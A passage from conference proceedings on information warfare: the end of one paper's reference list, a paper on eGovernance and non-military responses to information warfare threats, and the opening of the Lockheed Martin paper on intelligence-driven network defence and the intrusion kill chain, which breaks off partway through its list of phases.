NATO Defence Planning Council (DPC) (2003) Decision Sheet, http://www.nato.int/docu/pr/2003/p030216e.htm,<br />

cf. Press Release (2003)013 at http://www.nato.int/docu/pr/2003/p03-013e.htm<br />

NATO NATO Glossary of Terms and Definitions (AAP-6) (annually updated publication) (quoted NATO Glossary)<br />

104


Ulf Haeussler<br />

NCSA (2009) NCSA Supports the Cyber Coalition 2009 undated,<br />

http://www.ncsa.nato.int/news/2009/20091217_NCSA_Supports_the_Cyber_Coalition_2009.html<br />

Owens, W.A., Dam, K.W. and Lin, H.S. (2009) (for the National Research Council) Technology, Policy, Law, and<br />

Ethics Regarding U.S. Acquisition and Use of Cyberattack Capabilities<br />

Oxford University Press (1989) Oxford Advanced Learner's Dictionary<br />

U.S. Department of Defense (DoD) Dictionary of Military and Associated Terms as amended through April 2010<br />

(JP 1-02) (quoted DoD Dictionary)<br />

Vamosi R. (2011) The US Needs To Learn To Limit–Not Win–A Cyber War,<br />

http://blogs.forbes.com/firewall/?p=2604<br />

Wikipedia "Zero Day Attack", http://en.wikipedia.org/wiki/Zero-day_attack (last visited 15 November 2010)<br />

105


eGovernance and Strategic Information Warfare – non<br />

Military Approach<br />

Karim Hamza and Van Dalen<br />

Maastricht School of Management, Netherlands<br />

hamza@msm.nl<br />

dalen@msm.nl<br />

Abstract: Most of the developed Governments, active in reaping the benefits of eGovernance, nowadays have<br />

discovered the threats of this new approach too. They invest massively to cope with the highly complex decision<br />

making systems of today, dramatic changes in economy, technology and Information Warfare threats plus<br />

government’s own changing strategies. This creates challenges with respect to matching decision-making<br />

structures. eGovernance Frameworks is defined by the UNESCO as “the use of ICT (Information and<br />

communication technologies) by different actors of the society with the aim to improve their access to information<br />

and to build their capacities”. It may be expected that eGovernance will have more strategic importance for many<br />

governments and that its concepts and tools will develop dramatically in the coming decade. This will raise the<br />

urgencies and importance of protecting government decision making processes from non-solicited disturbing<br />

external or internal interferences. Security is critical to the success of any eGovernance framework. Since such<br />

governance frameworks somehow will be open to interactions with different “stakeholders” Internally (within the<br />

boundaries of the state, like pressure groups, political parties, business, citizens ..) or Externally (e.g. other<br />

states, multinational businesses, worldwide operating malicious organizations,..) who may influence the decision<br />

making process in government, create political pressure or even start a cyber-war, by making use of<br />

eGovernance frameworks. This raises a number of prevention issues to cope with, like instability of the decision<br />

making processes, or even instability of real development processes in states. This causes efforts to add to the<br />

design process of eGovernance frameworks a new dimension, popularly labeled “Information Warfare Strategy”,<br />

with the aim to build in existing and future eGovernance Frameworks safeguarding tools; to prevent abuse of<br />

such frameworks in practical government decision cases. Traditionally there is a distinction between military vs.<br />

non-military approaches. The question has to be raised in how far a distinction between Technology (ICT) vs.<br />

non-Technology tools (like diplomacy, or legal) will be more appropriate. However we have to recognize that any<br />

line of distinction is arbitrary and will show the need for some dynamics, because parties involved will learn and<br />

improve.<br />

Keywords: eGovernment, government transformation, public sector information systems, e governance<br />

framework, information warfare, non military strategies<br />

1. Introduction<br />

Rapid change and development in the concept of eGovernance and Strategic information Warfare,<br />

makes it necessary to look for clear definition of both terms, examine the relation of each other and<br />

how they can impact government or state, primary findings showed that main common elements in<br />

these definition is Information and Technology, normally information is seen as a revolution age which<br />

need specific attention as Drucker mentioned “The next information revolution is well underway. But it<br />

is not happening where information scientists, information executives, and the information industry in<br />

general are looking for it. It is not a revolution in technology, machinery, techniques, software, or<br />

speed. It is a revolution in concepts” (Drucker, 1998). Also if we looked for a defensive point of view,<br />

Dearth mentioned “Defense is no longer the relatively straightforward issue of the sort and extent of<br />

physical measures that need to be taken to protect one’s valued assets. Many of the assets requiring<br />

protection are in the civil sector, but the protection of them is perhaps not best or properly done by<br />

military means” (Dearth, 2001). This requires tools and techniques which is not physical only but in<br />

concept and using non military approaches to protect the government information represented in<br />

eGovernance.<br />

Presence of threats like terrorists, competitors, state enemies and malicious organizations makes<br />

information warfare a threat to governments and the private sectors attached to eGovernance<br />

frameworks very important. It will raise high attention to develop strategic information warfare to<br />

protect dimensions, such as: Military, Physical, Economic, Political, and Social (RAND, 1996).<br />

Governments have to develop technological as well as non-technological tools and mechanisms that<br />

can supplement dynamic eGovernance frameworks. Application domains encompass fields like<br />

Political, Legal and Diplomatic. Interaction between agencies inside and outside the government, in<br />

addition to international affairs will be needed to define international legal regulations and political<br />

channels to control relevant threats. In the end, it will certainly require (re)definition of the distribution<br />

106


Karim Hamza and Van Dalen<br />

of responsibilities for international legal arrangements in case of legal disputes, as the ones taking<br />

place in the United Nations or NATO. Special attention has to be devoted to the problem of void<br />

governance spaces, example in this continually changing playing field, asking for occasional<br />

governance solutions sometimes.<br />

This research examines Non Military and non technology approaches to Strategic Information Warfare<br />

related to the development of an eGovernance Framework Design Process Model with regard to<br />

Economic, Political and Social dimensions.<br />

With the following concentrations:<br />

Definition of eGovernance framework<br />

Definition of Strategic Information Warfare<br />

Types of Information Warfare: Cyber War / Cyber Crime / Espionage<br />

Types of threats Internal / External and State / Non State<br />

Importance of eGovernance National security and the need to be covered in Information warfare<br />

strategies.<br />

Non Military response: Policies, Laws, Diplomacies, Awareness and Media<br />

Adaptability on dynamic eGovernance framework<br />

what conditions of Strategic Information warfare have to be taken into account in the design<br />

process of eGovernance frameworks<br />

All conditioned by fundamental civil rights to interact with governments and the control on the legality<br />

of such approaches.<br />

2. eGovernance frame work<br />

Nowadays ‘ eGovernance’ as a term became a very common expression in the last couple of years,<br />

but there is no standard definition for this term; since Different governments and organizations use it<br />

to suit specific aims or objectives. Commonly the term ‘eGovernment’ is used instead of ‘<br />

eGovernance’ due to confusion between the definitions of the two terms, while the first is the<br />

infrastructure of eGovernance and eGovernance covers a broader scope.<br />

So If we start by Governance which is focusing on what the government does to make sure that all<br />

concerned stakeholders are in the decision process and evaluate the outcomes, also which can be<br />

applied on corporate level, governance have different types like Corporate Governance, Project<br />

Governance, Good Governance, IT Governance, multi level governance and finally E Governance<br />

which focuses on the function of Governance using the technology and information systems as a tool.<br />

Normally we finds that The most common definition for eGovernance is defined by the UNESCO as<br />

“the use of ICT (Information and communication technologies) by different actors of the society, with<br />

the aim to improve their access to information and to build their capacities” (UNESCO, 2009). In much<br />

more detail according to the UNESCO, Governance refers to the exercise of political, economic and<br />

administrative authority in the management of a country’s affairs, including citizens’ articulation of their<br />

interests and exercise of their legal rights and obligations. eGovernance may be understood as the<br />

performance of this governance via the electronic medium in order to facilitate an efficient, speedy<br />

and transparent process of disseminating information to the public, and other agencies, and for<br />

performing government administration activities. eGovernance is generally considered as a wider<br />

concept than eGovernment, since it can bring about a change in the way how citizens relate to<br />

governments and to each other. eGovernance can bring forth new concepts of citizenship, both in<br />

terms of citizen needs and responsibilities. Its objective is to engage, enable and empower the citizen<br />

(different stakeholders). The use of information technology can increase the broad involvement of<br />

citizens in the process of governance at all levels by providing the possibility of on-line discussion<br />

groups and by enhancing the rapid development and effectiveness of pressure groups.<br />

It is obvious that Advantages for the government include the government’s ability to provide a better<br />

service in terms of time, making governance more efficient and more effective. In addition, the<br />

transaction costs can be lowered and government services become more accessible.<br />

107


Karim Hamza and Van Dalen<br />

This leads to the eGovernance Framework which organizes the eGovernance activity and focuses on:<br />

1. Establishing the governance, monitoring and control,<br />

2. Develop and response strategic direction for the different stakeholders,<br />

3. Defining roles and responsibility matrix and<br />

4. adapt to new changes in strategies<br />

Since eGovernance will be responsible to hold most of the government, economy and community<br />

information plus it will engage different stake holders internal and external to the country, then security<br />

and protection will become the biggest concern. As fear of all fears. (Mechling, 2000) mentioned that one<br />

of the most common issues in Governance are: Protecting privacy and security, which is one of the<br />

major concerns and can be considered as an obstacle for such systems. Substantially, defense and<br />

security of this framework will be Critical to its success, the political risks of security breaches in this<br />

framework perceived to be far more serious than other risks, since it can impact the government’s<br />

political position, the economy and citizens.<br />

3. Strategic information warfare<br />

The concept of Information Warfare has been well documented (for example, Schwartau, 1996;<br />

Dearth and Williamson, 1996; Knecht, 1996; Waltz, 1998; Denning, 1999). By definition, the<br />

fundamental weapon and target in the information’s warfare is 'information'. It is the product that has<br />

to be manipulated to the advantage of those trying to influence events. The means of achieving this<br />

are manifold. Protagonists can attempt to directly alter data or to deprive competitors from access to<br />

it. The technology of information collection, storage, and dissemination can be compromised. Using<br />

other, more subtle techniques, the way the data is interpreted can be changed by altering the context<br />

that it is viewed. Thus, the range of activities in the brief of information warfare is manifest. (Hutchinson,<br />

Warren, 2001)<br />

Figure 1: The relationships between data, context, knowledge, information; and the methods by<br />

which each element can be attacked, (Hutchinson, Warren, 2001)<br />

108


Karim Hamza and Van Dalen<br />

From a military point of view, there is an enemy defined and specific actions and procedures are<br />

prepared for defense or attack, but with eGovernance not all enemies are defined or detected which<br />

encourages delivering a concept to detect such enemies or threats.<br />

There were different definitions and concepts related to information warfare (Libicki, 1995)<br />

Command-and-Control Warfare [C2W];<br />

Intelligence-based Warfare [IBW];<br />

Electronic Warfare [EW];<br />

Psychological Operations [PSYOPS];<br />

Hacker war software-based attacks on information systems;<br />

Information Economic Warfare [IEW] war via the control of information trade;<br />

Cyberwar [combat in the virtual realm].<br />

As an example; The United States has substantial information-based resources, including complex<br />

management systems and infrastructures involving the control of electric power, money flow, air<br />

traffic, oil and gas, and other information-dependent items. U.S. allies and potential coalition partners<br />

are similarly increasingly dependent on various information infrastructures. Conceptually, if and when<br />

potential adversaries attempt to damage these systems using IW techniques, information warfare<br />

inevitably takes on a strategic aspect. (Roger, Molander, Riddile, Wilson, 1996)<br />

The Basic Features of Strategic Information Warfare:<br />

Low entry cost: Unlike traditional weapon technologies, development of information- based<br />

techniques does not require sizable financial resources or state sponsorship. Information systems<br />

expertise and access to important networks may be the only prerequisites.<br />

Blurred traditional boundaries: Traditional distinctions; public versus private interests, warlike<br />

versus criminal behavior and geographic boundaries, such as those between nations as<br />

historically defined, are complicated by the growing interaction within the information<br />

infrastructure.<br />

4. Types of information warfare: Cyber war / cyber crime / espionage<br />

The Department of Defense (DoD) defines cyberspace as follows: A global domain within the<br />

information environment consisting of the interdependent network of information technology<br />

infrastructures, including the Internet, telecommunications networks, computer systems, and<br />

embedded processors and controllers. (DoD Dictionary of Military, 2008)<br />

Recently, cyberspace which is becoming the main field of information warfare started to develop as a<br />

military domain. To join the historic domains of land, sea, air, and space. All this might lead to a belief<br />

that the historic constructs of war like force, offense, defense, and deterrence can be applied to<br />

cyberspace with a little modification. But it must be understood in its own terms, and policy decisions<br />

being made for these and other new commands must reflect such understanding. Attempts to transfer<br />

policy constructs from other forms of warfare will not only fail but also hinder policy and<br />

planning.(Libicki, 2009)<br />

Normally the main targets for an Information Attack as Denning (1999) outlines the potential elements<br />

in an information system that are prone to attack and exploitation as:<br />

Data stores: for example, computer and human memories.<br />

Communication channels: for example, humans, and telecommunication systems.<br />

Sensors/input devices: for example, scanners, cameras, microphones, human senses.<br />

Output devices: for example, disk writers, printers, human processes.<br />

Manipulators of data: for example, microprocessors, humans, software.<br />

Most related information warfare was as below:<br />

Strategic Cyber-War: A campaign of Cyber-Attacks launched by one entity against a state and<br />

its society, primarily but not exclusively for the purpose of affecting the target state’s behavior,<br />

would be strategic Cyber-War. The attacking entity can be a state or a non-state actor (Libicki, 2009)<br />

109


Karim Hamza and Van Dalen<br />

Cyber-War: actions by a nation-state to penetrate another nation's computers or networks for the<br />

purposes of causing damage or disruption. (Clarke, 2010)<br />

Cyber Crime: refers to any crime that involves a computer and a network, where the computers<br />

may or may not have played an instrumental part in the commission of a crime<br />

Espionage or spying: involves individuals obtaining information that is considered secret or<br />

confidential without the permission of the holder of this information.<br />

5. Types of threats internal / external and state / non state<br />

Critical to the success of any eGovernance framework, is its security. Since such governance<br />

frameworks somehow will be open to interactions with different “stakeholders”, who may, by making<br />

use of eGovernance frameworks, influence the decision making process in the government, create<br />

political pressure or even start a cyber-war.<br />

A. Internal Stakeholders [Domestic] (within the boundaries of the state) as<br />

Pressure groups,<br />

Political parties,<br />

Business,<br />

Citizens<br />

Organized crime .. etc<br />

or<br />

B. External Stakeholders [Foreign] (outside boundaries of the state) as<br />

Other states,<br />

Multinational businesses,<br />

Worldwide operating malicious organizations,.. etc<br />

Given the wide array of possible opponents, weapons, and strategies, it becomes increasingly difficult<br />

to distinguish between foreign and domestic sources of IW threats and actions. You may not know<br />

who’s under attack by whom, or who’s in charge of the attack. This greatly complicates the traditional<br />

role distinction between domestic law enforcement, on the one hand, and national security and<br />

intelligence entities on the other. Another consequence of this blurring phenomenon is the<br />

disappearance of clear distinctions between different levels of anti-state activity, ranging from crime to<br />

warfare. (Roger, Molander, Riddile, Wilson, 1996)<br />

6. Importance of eGovernance national security and the need to be covered in<br />

information warfare strategies<br />

Presence of threats, like: terrorists, competitors, state enemies and malicious organizations makes<br />

the threat of information warfare very important to governments and private sector attached to<br />

eGovernance frameworks. It will raise a high attention to develop strategic information warfare to<br />

protect dimensions as: Military, Physical, Economic, Political, And Social (Roger, Molander, Riddile, Wilson,<br />

1996).<br />

7. Non military response: Policies, laws, diplomacies, awareness and media<br />

Governments have to develop military as well as non-military tools and mechanisms that can<br />

supplement dynamic eGovernance frameworks. Application domains encompass fields like Political,<br />

Legal and Diplomatic. Interaction between agencies inside and outside the government, in addition to<br />

international affairs will be needed to define international legal regulations and political channels to<br />

control relevant threats. In the end, it will certainly require a (re)definition of the distribution of<br />

responsibilities for international legal arrangements in case of legal disputes, as that’s taking place in<br />

the United Nations or NATO.<br />

The appropriate role for the government in responding to the strategic Information Warfare threat<br />

impacting the eGovernance framework needs to be addressed, this role to be part leadership and part<br />

partnership with the domestic sector. In addition to being the performer of certain basic functions such<br />

as; organizing, equipping, training, and sustaining military forces, the government may play a more<br />

110


Karim Hamza and Van Dalen<br />

productive and efficient role as facilitator and maintainer of some information systems and<br />

infrastructure, and through policy mechanisms such as; tax breaks to encourage reducing vulnerability<br />

and improving recovery and reconstitution capability. An important factor is the traditional change in<br />

the government’s role as one move from national defense through public safety toward things that<br />

represent the public good. Clearly, the government’s perceived role in this area will have to be<br />

balanced against public perceptions of the loss of civil liberties and the commercial sector’s concern<br />

about unwarranted limits on its practices and markets.<br />

When responding to information warfare, military strategy can thus no longer focus just on support to<br />

and operations. It must also examine information warfare implications on its state and allies’ strategic<br />

infrastructures military, physical, economic, political, and social that depends upon information<br />

systems and information support.<br />

Figure 2: Strategic information warfare impact , (Roger, Molander, Riddile, Wilson, 1996)<br />

Government can use and develop different tools and techniques to handle such situation<br />

Research and Development: The government’s role in defending against such threats, apart from<br />

protecting its own systems, is indirect: Sponsor research, development, and standard creation in<br />

computer network defense. Maximize the incentives for private industry to keep its own house in<br />

order. Increase the resources devoted to cyber forensics, including the distribution of honeypots<br />

to trap rogue code for analysis. Encourage information-sharing among both private and public<br />

network operators. Invest in threat intelligence. Subsidize the education of computer security<br />

professionals. All are current agenda items. In a cyberwar, all would receive greater emphasis.<br />

(LibiCki, 2009)<br />

Policy : defining policies that deals with different Strategic Information Warfare threats and<br />

engage different international parties , also working on modify constitutes an act of war, which<br />

may be defined as one of three ways: universally, multilaterally, and unilaterally. A universal<br />

definition is one that every state accepts. The closest analog to “every state” is when the United<br />

Nations says that something is an act of war. The next-closest analog is if enough nations have<br />

signed a treaty that says as much. No such United Nations dictum exists, and no treaty says as<br />

much. One might argue that a cyber attack (which is an output of Strategic Information warfare) is<br />

like something else that is clearly an act of war, but unless there is a global consensus that such<br />

an analogy is valid, it cannot be defined as an act of war.<br />

Laws : develop clear laws to criminalize action which threat eGovernance framework specially<br />

with internal threat<br />

Diplomatic : develop allies networks to discover different joint threats that can impact each other<br />

Governance through intelligence and early detections<br />

111


Karim Hamza and Van Dalen<br />

Awareness and Media : create citizen/personal awareness working and dealing with<br />

eGovernance framework, on how to protect themselves, how to report violation, be awre with<br />

different types of threat and the legal impact of violation<br />

8. Conclusion<br />

It is becoming obvious that eGovernance will become the information backbone of any government<br />

which creates a strong relation to strategic information warfare; since both are based on information<br />

and use technology. In addition, the first will contain most of the government’s and community<br />

information and will become the main war fields in the future. This requires different set of attention;<br />

since not all existing warfare techniques will be applicable in handling eGovernance threats; this<br />

should include non military approaches like Policy, diplomatic and laws.<br />

eGovernance framework main challenge is adaptability on dynamic eGovernance framework; since<br />

continuous changes on government strategies and the environment surrounding it plus the continuous<br />

changes of technology and threat parties either internal or external, will require continuous<br />

development to cope with such changes and complex decision making structure, not to forget that<br />

some conditions of strategic information warfare have to be taken into account in the design process<br />

of eGovernance frameworks, like: control of different stakeholders, monitor and detection, continuous<br />

development and defining different sets of response approaches to deal with the rapid changing<br />

environment and changing enemy map.<br />

References<br />

Bhatnagar, Subash EGovernment: From Vision to Implementation” by; Sage Publications; 2004.<br />

Clarke , Richard A. (April, 2010) Cyber War: The Next Threat to National Security and What to Do About, Ecco<br />

Dearth, Douglas H., (2001) “Implications and Challenges of Applied Information Operations”, Joint Military<br />

Intelligence Training Centre Washington D.C. Journal of Information Warfare Volume 1, Issue1<br />

Denning, D.E. (1999). Information Warfare and Security, Addison Wesley, Reading: Mass.<br />

DoD Dictionary of Military Terms (October,2008), Washington, D.C, Joint Doctrine Division, J-7<br />

Drucker, Peter F. (August 24, 1998) “the Next Information Revolution” , Forbes ASAP.<br />

Hutchinson, W. and Warren, M. (2001) “Principles of Information Warfare”, Journal of Information Warfare 1, 1:1 -<br />

6 1 ISSN 1445-3312 print/ISSN 1445-3347<br />

Hutchinson, W.E. Warren, M.J. (1999). Attacking the Attackers: Attitudes of Australian IT Managers to retaliation<br />

against Hackers, ACIS (Australasian <strong>Conference</strong> on Information Systems) 99, December, Wellington, New<br />

Zealand.<br />

Libicki, Martin C. (2009) CyberDeterrence and CyberWar , Rand Corporation, Project Air Force<br />

Libicki, Martin C.(May,1995) “What Is Information Warfare?” Strategic<br />

Mechling, J. (2000), Eight Imperatives for Leaders in a Networked World, Massachusetts, The Harvard Policy<br />

Group<br />

Roger C. Molander/Andrew S. Riddile/Peter A. Wilson (1996) “Strategic Information Warfare, A New Face of<br />

War” Office of the Secretary of Defense, National Defense Research Institute , Rand<br />

Schwartau, W. (1996). Information Warfare – second edition. Thunder’s Mouth Press, New York.<br />

UNESCO(2009) http://portal.unesco.org/ci/en/ev.php-<br />

URL_ID=4404&URL_DO=DO_TOPIC&URL_SECTION=201.html (extracted 07.10.2010)<br />

Waltz, E. (1998) Information Warfare – Principles and Operations. Artech House, Norwood.<br />

World Bank : Source: http://go.worldbank.org/M1JHE0Z280 (extracted on 02.10.2010)<br />

112


Intelligence-Driven Computer Network Defense Informed<br />

by Analysis of Adversary Campaigns and Intrusion Kill<br />

Chains<br />

Eric Hutchins, Michael Cloppert and Rohan Amin<br />

Lockheed Martin, USA<br />

eric.m.hutchins@lmco.com<br />

michael.j.cloppert@lmco.com<br />

rohan.m.amin@lmco.com<br />

Abstract: Conventional network defense tools such as intrusion detection systems and anti-virus focus on the<br />

vulnerability component of risk, and traditional incident response methodology presupposes a successful<br />

intrusion. An evolution in the goals and sophistication of computer network intrusions has rendered these<br />

approaches insufficient for certain actors. A new class of threats, appropriately dubbed the “Advanced Persistent<br />

Threat” (APT), represents well-resourced and trained adversaries that conduct multi-year intrusion campaigns<br />

targeting highly sensitive economic, proprietary, or national security information. These adversaries accomplish<br />

their goals using advanced tools and techniques designed to defeat most conventional computer network<br />

defense mechanisms. Network defense techniques which leverage knowledge about these adversaries can<br />

create an intelligence feedback loop, enabling defenders to establish a state of information superiority which<br />

decreases the adversary's likelihood of success with each subsequent intrusion attempt. Using a kill chain model<br />

to describe phases of intrusions, mapping adversary kill chain indicators to defender courses of action, identifying<br />

patterns that link individual intrusions into broader campaigns, and understanding the iterative nature of<br />

intelligence gathering form the basis of intelligence-driven computer network defense (CND). Institutionalization<br />

of this approach reduces the likelihood of adversary success, informs network defense investment and resource<br />

prioritization, and yields relevant metrics of performance and effectiveness. The evolution of advanced persistent<br />

threats necessitates an intelligence-based model because in this model the defenders mitigate not just<br />

vulnerability, but the threat component of risk, too.<br />

Keywords: incident response, intrusion detection, intelligence, threat, APT, computer network defense<br />

1. Introduction<br />

As long as global computer networks have existed, so have malicious users intent on exploiting<br />

vulnerabilities. Early evolutions of threats to computer networks involved self-propagating code.<br />

Advancements over time in anti-virus technology significantly reduced this automated risk. More<br />

recently, a new class of threats, intent on the compromise of data for economic or military<br />

advancement, emerged as the largest element of risk facing some industries. This class of threat has<br />

been given the moniker “Advanced Persistent Threat,” or APT. To date, most organizations have<br />

relied on the technologies and processes implemented to mitigate risks associated with automated<br />

viruses and worms which do not sufficiently address focused, manually operated APT intrusions.<br />

Conventional incident response methods fail to mitigate the risk posed by APTs because they make<br />

two flawed assumptions: response should happen after the point of compromise, and the compromise<br />

was the result of a fixable flaw (Mitropoulos et al., 2006; National Institute of Standards and<br />

Technology, 2008).<br />

APTs have recently been observed and characterized by both industry and the U.S. government. In<br />

June and July 2005, the U.K. National Infrastructure Security Co-ordination Centre (UK-NISCC) and<br />

the U.S. Computer Emergency Response Team (US-CERT) issued technical alert bulletins describing<br />

targeted, socially-engineered emails dropping trojans to exfiltrate sensitive information. These<br />

intrusions were over a significant period of time, evaded conventional firewall and anti-virus<br />

capabilities, and enabled adversaries to harvest sensitive information (UK-NISCC, 2005; US-CERT,<br />

2005). Epstein and Elgin (2008) of Business Week described numerous intrusions into NASA and<br />

other government networks where APT actors were undetected and successful in removing sensitive<br />

high-performance rocket design information. In February 2010, iSec Partners noted that current<br />

approaches such as anti-virus and patching are not sufficient, end users are directly targeted, and<br />

threat actors are after sensitive intellectual property (Stamos, 2010).<br />

Before the U.S. House Armed Services Committee Subcommittee on Terrorism, Unconventional<br />

Threats and Capabilities, James Andrew Lewis of the Center for Strategic and International Studies<br />

testified that intrusions occurred at various government agencies in 2007, including the Department of<br />

113


Eric Hutchins et al.<br />

Defense, State Department and Commerce Department, with the intention of information collection<br />

(Lewis, 2008). With specificity about the nature of computer network operations reportedly emanating<br />

from China, the 2008 and 2009 reports to Congress of the U.S.-China Economic and Security Review<br />

Commission summarized reporting of targeted intrusions against U.S. military, government and<br />

contractor systems. Again, adversaries were motivated by a desire to collect sensitive information<br />

(U.S.-China Economic and Security Review Commission, 2008, 2009). Finally, a report prepared for<br />

the U.S.-China Economic and Security Review Commission, Krekel (2009) profiles an advanced<br />

intrusion with extensive detail demonstrating the patience and calculated nature of APT.<br />

Advances in infrastructure management tools have enabled best practices of enterprise-wide patching<br />

and hardening, reducing the most easily accessible vulnerabilities in networked services. Yet APT<br />

actors continually demonstrate the capability to compromise systems by using advanced tools,<br />

customized malware, and “zero-day” exploits that anti-virus and patching cannot detect or mitigate.<br />

Responses to APT intrusions require an evolution in analysis, process, and technology; it is possible<br />

to anticipate and mitigate future intrusions based on knowledge of the threat. This paper describes an<br />

intelligence-driven, threat-focused approach to study intrusions from the adversaries’ perspective.<br />

Each discrete phase of the intrusion is mapped to courses of action for detection, mitigation and<br />

response. The phrase “kill chain” describes the structure of the intrusion, and the corresponding<br />

model guides analysis to inform actionable security intelligence. Through this model, defenders can<br />

develop resilient mitigations against intruders and intelligently prioritize investments in new technology<br />

or processes. Kill chain analysis illustrates that the adversary must progress successfully through<br />

each stage of the chain before it can achieve its desired objective; just one mitigation disrupts the<br />

chain and the adversary. Through intelligence-driven response, the defender can achieve an<br />

advantage over the aggressor for APT caliber adversaries.<br />

This paper is organized as follows: section two of this paper documents related work on phase based<br />

models of defense and countermeasure strategy. Section three introduces an intelligence-driven<br />

computer network defense model (CND) that incorporates threat-specific intrusion analysis and<br />

defensive mitigations. Section four presents an application of this new model to a real case study, and<br />

section five summarizes the paper and presents some thoughts on future study.<br />

2. Related work<br />

While the modeling of APTs and corresponding response using kill chains is unique, other phase<br />

based models to defensive and countermeasure strategies exist.<br />

A United States Department of Defense Joint Staff publication describes a kill chain with stages find,<br />

fix, track, target, engage, and assess (U.S. Department of Defense, 2007). The United States Air<br />

Force (USAF) has used this framework to identify gaps in Intelligence, Surveillance and<br />

Reconnaissance (ISR) capability and to prioritize the development of needed systems (Tirpak, 2000).<br />

Threat chains have also been used to model Improvised Explosive Device (IED) attacks (National<br />

Research Council, 2007). The IED delivery chain models everything from adversary funding to attack<br />

execution. Coordinated intelligence and defensive efforts focused on each stage of the IED threat<br />

chain as the ideal way to counter these attacks. This approach also provides a model for identification<br />

of basic research needs by mapping existing capability to the chain. Phase based models have also<br />

been used for antiterrorism planning. The United States Army describes the terrorist operational<br />

planning cycle as a seven step process that serves as a baseline to assess the intent and capability<br />

of terrorist organizations (United States Army Training and Doctrine Command, 2007). Hayes (2008)<br />

applies this model to the antiterrorism planning process for military installations and identifies<br />

principles to help commanders determine the best ways to protect themselves.<br />

Outside of military context, phase based models have also been used in the information security field.<br />

Sakuraba et al. (2008) describe the Attack-Based Sequential Analysis of Countermeasures (ABSAC)<br />

framework that aligns types of countermeasures along the time phase of an attack. The ABSAC<br />

approach includes more reactive post-compromise countermeasures than early detection capability to<br />

uncover persistent adversary campaigns. In an application of phase based models to insider threats,<br />

Duran et al. (2009) describe a tiered detection and countermeasure strategy based on the progress of<br />

malicious insiders. Willison and Siponen (2009) also address insider threat by adapting a phase<br />

based model called Situational Crime Prevention (SCP). SCP models crime from the offender’s<br />

perspective and then maps controls to various phases of the crime. Finally, the security company<br />

Mandiant proposes an “exploitation life cycle”. The Mandiant model, however, does not map courses<br />

114


Eric Hutchins et al.<br />

of defensive action and is based on post-compromise actions (Mandiant, 2010). Moving detections<br />

and mitigations to earlier phases of the intrusion kill chain is essential for CND against APT actors.<br />

3. Intelligence-driven computer network defense<br />

Intelligence-driven computer network defense is a risk management strategy that addresses the<br />

threat component of risk, incorporating analysis of adversaries, their capabilities, objectives, doctrine<br />

and limitations. This is necessarily a continuous process, leveraging indicators to discover new<br />

activity with yet more indicators to leverage. It requires a new understanding of the intrusions<br />

themselves, not as singular events, but rather as phased progressions. This paper presents a new<br />

intrusion kill chain model to analyze intrusions and drive defensive courses of action.<br />

The effect of intelligence-driven CND is a more resilient security posture. APT actors, by their nature,<br />

attempt intrusion after intrusion, adjusting their operations based on the success or failure of each<br />

attempt. In a kill chain model, just one mitigation breaks the chain and thwarts the adversary,<br />

therefore any repetition by the adversary is a liability that defenders must recognize and leverage. If<br />

defenders implement countermeasures faster than adversaries evolve, it raises the costs an<br />

adversary must expend to achieve their objectives. This model shows, contrary to conventional<br />

wisdom, such aggressors have no inherent advantage over defenders.<br />

3.1 Indicators and the indicator life cycle<br />

The fundamental element of intelligence in this model is the indicator. For the purposes of this paper,<br />

an indicator is any piece of information that objectively describes an intrusion. Indicators can be<br />

subdivided into three types:<br />

Atomic – Atomic indicators are those which cannot be broken down into smaller parts and retain<br />

their meaning in the context of an intrusion. Typical examples here are IP addresses, email<br />

addresses, and vulnerability identifiers.<br />

Computed – Computed indicators are those which are derived from data involved in an incident.<br />

Common computed indicators include hash values and regular expressions.<br />

Behavioral – Behavioral indicators are collections of computed and atomic indicators, often<br />

subject to qualification by quantity and possibly combinatorial logic. An example would be a<br />

statement such as ”the intruder would initially used a backdoor which generated network traffic<br />

matching [regular expression] at the rate of [some frequency] to [some IP address], and then<br />

replace it with one matching the MD5 hash [value] once access was established.”<br />

Using the concepts in this paper, analysts will reveal indicators through analysis or collaboration,<br />

mature these indicators by leveraging them in their tools, and then utilize them when matching activity<br />

is discovered. This activity, when investigated, will often lead to additional indicators that will be<br />

subject to the same set of actions and states. This cycle of actions, and the corresponding indicator<br />

states, form the indicator life cycle illustrated in Figure 1.<br />

Figure 1: Indicator life cycle states and transitions<br />

115


Eric Hutchins et al.<br />

This applies to all indicators indiscriminately, regardless of their accuracy or applicability. Tracking the<br />

derivation of a given indicator from its predecessors can be time-consuming and problematic if<br />

sufficient tracking isn’t in place, thus it is imperative that indicators subject to these processes are<br />

valid and applicable to the problem set in question. If attention is not paid to this point, analysts may<br />

find themselves applying these techniques to threat actors for which they were not designed, or to<br />

benign activity altogether.<br />

3.2 Intrusion kill chain<br />

A kill chain is a systematic process to target and engage an adversary to create desired effects. U.S.<br />

military targeting doctrine defines the steps of this process as find, fix, track, target, engage, assess<br />

(F2T2EA): find adversary targets suitable for engagement; fix their location; track and observe; target<br />

with suitable weapon or asset to create desired effects; engage adversary; assess effects (U.S.<br />

Department of Defense, 2007). This is an integrated, end-to-end process described as a “chain”<br />

because any one deficiency will interrupt the entire process.<br />

Expanding on this concept, this paper presents a new kill chain model, one specifically for intrusions.<br />

The essence of an intrusion is that the aggressor must develop a payload to breach a trusted<br />

boundary, establish a presence inside a trusted environment, and from that presence, take actions<br />

towards their objectives, be they moving laterally inside the environment or violating the<br />

confidentiality, integrity, or availability of a system in the environment. The intrusion kill chain is<br />

defined as reconnaissance, weaponization, delivery, exploitation, installation, command and control<br />

(C2), and actions on objectives.<br />

With respect to computer network attack (CNA) or computer network espionage (CNE), the definitions<br />

for these kill chain phases are as follows:<br />

Reconnaissance - Research, identification and selection of targets, often represented as crawling<br />

Internet websites such as conference proceedings and mailing lists for email addresses, social<br />

relationships, or information on specific technologies.<br />

Weaponization - Coupling a remote access trojan with an exploit into a deliverable payload,<br />

typically by means of an automated tool (weaponizer). Increasingly, client application data files<br />

such as Adobe Portable Document Format (PDF) or Microsoft Office documents serve as the<br />

weaponized deliverable.<br />

Delivery - Transmission of the weapon to the targeted environment. The three most prevalent<br />

delivery vectors for weaponized payloads by APT actors, as observed by the Lockheed Martin<br />

Computer Incident Response Team (LM-CIRT) for the years 2004-2010, are email attachments,<br />

websites, and USB removable media.<br />

Exploitation - After the weapon is delivered to victim host, exploitation triggers intruders’ code.<br />

Most often, exploitation targets an application or operating system vulnerability, but it could also<br />

more simply exploit the users themselves or leverage an operating system feature that autoexecutes<br />

code.<br />

Installation - Installation of a remote access trojan or backdoor on the victim system allows the<br />

adversary to maintain persistence inside the environment.<br />
